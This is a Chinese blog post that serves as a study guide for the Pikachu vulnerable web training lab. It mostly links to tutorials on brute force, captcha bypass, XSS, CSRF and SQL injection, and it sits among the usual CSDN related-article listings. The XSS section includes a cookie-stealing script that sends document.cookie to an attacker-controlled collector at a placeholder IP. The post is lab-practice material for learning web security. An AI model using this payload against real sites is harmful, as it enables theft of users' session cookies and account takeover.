pikachu靶场环境搭建指南&通关系列附带知识点(持续更新中)

已于 2024-08-08 21:39:52 修改
阅读量1k 收藏 18
点赞数 19
文章标签: 网络安全 安全 系统安全 web安全
于 2024-07-22 15:53:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60071244/article/details/140612149
版权

前情提要

此文章用于解答疑惑与以后提升能力用,非全程操作教程。

正文

 教学视频:

地址:【web渗透入门靶场pikachu(高清)】

pikachu靶场

地址:https://github.com/zhuifengshaonianhanlu/pikachu

burp suite的四种 attack type(攻击类型)

地址:https://blog.csdn.net/qq_38632151/article/details/102600053

常用端口号大全

地址:https://blog.csdn.net/qq_43236906/article/details/109249050

关闭端口占用进程

地址:https://blog.csdn.net/qq_41153943/article/details/104734054

pikachu数据连接失败,请仔细检查inc/config.inc.php的配置解决方法。

地址:https://blog.csdn.net/m0_66588420/article/details/139119430

暴力破解

 基于前端的验证码绕过(On client)

基于服务器的验证码绕过(On server)

(未)Pikachu-XSS漏洞之cookie值获取、钓鱼结果和键盘记录实战记录

3-7、8、5、6

xss后台根据小破站up视频创建就好了,需要改些文件,相信聪明的你可以改好哈。

精简版教程:https://www.cnblogs.com/li2019/p/12650512.html

丰富版教程:使用pikachu管理工具下的XSS后台进行实战_pikachu xss后台

XSS(get型)之cookie值获取:

攻击代码:

<script>document.location = ‘http://xxx.xxx.xxx.xxx/Pikachu-master/pkxss/xcookie/cookie.php?cookie=’ + document.cookie;</script>

注意:http://xx.xx.xx.xx/Pikachu-master/    (xx.xx.xx.xx为自己的IP地址,  pikachu-master是路径名, 我的是http://192.168.xx.xx/Pikachu/ 

CSRF(跨站请求伪造漏洞)

CSRF Token

文章:CSRF漏洞原理攻击与防御(非常细)

SQL-Inject(SQL注入漏洞)
SQL-Inject漏洞原理概述

sqlmap:

SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了

临江仙935
关注
攻防系列——pikachu靶场通关练习
weixin_43140411的博客
10-23 2156
从来没有哪个时代的黑客像今天一样热衷于猜解密码 ---奥斯特洛夫斯基
pikachu靶场练习通关知识点总结
qq_45584159的博客
12-11 7906
pikachu靶场练习 文章目录pikachu靶场练习前言一.暴力破解1.1 基于表单的暴力破解1.2验证码绕过(on sever)1.3验证码绕过(on client)1.4tokon防爆破二、xssxss概述DOM:文档对象类型xss形成的原因:xss漏洞的测试流程:1.1反射型xss(get)1.2反射型xss(post)三.CSRF四.SQL注入五.RCE六.文件包含七.不安全的文件下载八.越权九.目录遍历十.敏感信息泄露十一,PHP反序列化十二.XXE十三.重定向十四.SSRF十五.管理工具
Pikachu靶场】安装部署通关详解超详细!!!(持续更新
weixin_54438700的博客
07-09 1434
Pikachu靶场,是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。使用世界上最好的语言PHP进行开发-_-,数据库使用的是mysql,因此运行Pikachu你需要提前安装好"PHP+MYSQL+间件(如apache,nginx等)"的基础环境。
SQL注入:pikachu靶场的SQL注入通关
qq_68163788的博客
05-24 2716
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
pikachu靶场通关
lc9992023的博客
09-17 1371
pikachu靶场通关笔记
SQL注入-Pikachu靶场通关_pikachu靶场通关sql
2401_84254530的博客
07-21 963
时间盲注整体上基本就是在布尔盲注的基础上增加if判断,并且与sleep配合,布尔盲注是当对的时候,返回正确的值,错误的时候返回错误的值,而时间盲注,不管正确还是错误都不会返回值,需要靠延迟判断。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
Pikachu靶场全级别通关教程详解
热门推荐
weixin_52385170的博客
12-02 4万+
Pikachu靶场通关教程,超详细,欢迎评论区留言,一起进步
pikachu靶场通关之sql注入系列
qq_51902218的博客
09-16 7219
1.判断是否注入(是否严格校验)(1)可控参数(id)能否影响页面显示(2)输入的SQL语句是否能报错(能通过数据库报错,看到数据库一些语句痕迹)(selectusername,passwordfromuserwhereid=?’)后面单引号或者双引号通过在URL修改对应的id值,值为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠\来探测URL是否存在注入点(3)输入的SQL语句能否不报错(我们的语句能够成功闭合)(selectusername,passwordf。......
Pikachu靶场通关指南
gitblog_06602的博客
09-26 389
Pikachu靶场通关指南 【下载地址】Pikachu靶场通关指南 Pikachu靶场通关指南本仓库提供了一个名为“pikachu靶场全部通关.pdf”的资源文件,该文件详细记录了Pikachu靶场的全部通关过程 项目地址: ht...
pikachu靶场通关之CSRF(1),2024年最新oppo网络安全面试
2401_83973995的博客
04-13 572
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。
pikachu通关记之本地文件包含 远程文件包含 不安全文件下载
qq_35258210的博客
01-11 1419
"""本人网安小白,此贴仅作为记录我个人测试的思路、总结以便后期复习;今后本着少就是多,慢就是快的方式一步一个脚印进行学习,把这个知识点学扎实了,再学另外一个知识点。费曼教授是不是曾经说过以教代学是最好的学习方式?有很多错点可圈可指,所以也请dalao指出不对的地方,所谓教他人的时候也是在稳固自身""" 未做严格排版,后面有时间了再来整理整理 目录 一、文件上传 1、client check 2、MIME type 3、getimagesize 二、文件包含 1、本地文件包含 2、远程文件
SQL注入-Pikachu靶场通关_pikachu靶场通关sql(1),网络安全应用开发基础大纲
m0_61369275的博客
04-06 898
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8538
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
ICT网络赛道安全考点知识总结4
m0_72765822的博客
11-04 753
RADIUS和HWTACACS协议通常都使用共享密钥对传输的用户信息进行加密,以确保安全传输。 用来封装EAP报文的RADIUS属性通常是"EAP-Message",它用于传输EAP认证过程的消息。 LDAP的域名属性通常是"DC"(Domain Component),用于表示域名的组成部分。 BFD(Bidirectional Forwarding Detection)可以用于检测网络设备之间直连物理链路的双向转发路径的故障,但也可以用于检测其他类型的链路故障。 管理员为虚拟系统手工分配资源时,
Neo4j数据库清理指南:如何安全地删除所有节点和索引
engchina的专栏
11-05 530
Neo4j数据库清理指南:如何安全地删除所有节点和索引
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 296
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
信息安全工程师(82)操作系统安全概述
m0_73399576的博客
11-08 825
信息安全工程师——操作系统安全概述篇
shodan 【2】(泷羽sec)
最新发布
m0_68984471的博客
11-08 654
shodan的使用方法
国标GB28181网页直播平台EasyGBS国标GB28181软件的应急管理与安全生产解决方案
EasyGBS的博客
11-04 846
EasyGBS作为国标GB28181协议的视频融合管理平台,能够实现全天候、稳定的安防监控,加强事件预防、应急处理和事后追责,缩短信息传递时间,构建覆盖市、县的纵向网络,并与相关单位联通。
pikachu靶场环境搭建
10-09
搭建Pikachu靶场环境,可以按照以下步骤进行: 1. 下载Pikachu靶场源代码。 2. 安装LAMP或LNMP等Web服务器环境。 3. 配置数据库,并创建相关数据库和表。 4. 将Pikachu靶场源代码放置在Web服务器的根目录下。 5. 配置Pikachu靶场的相关参数,包括数据库连接信息、管理员账号密码等。 6. 启动Web服务器,访问Pikachu靶场网站,检查是否能够正常访问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值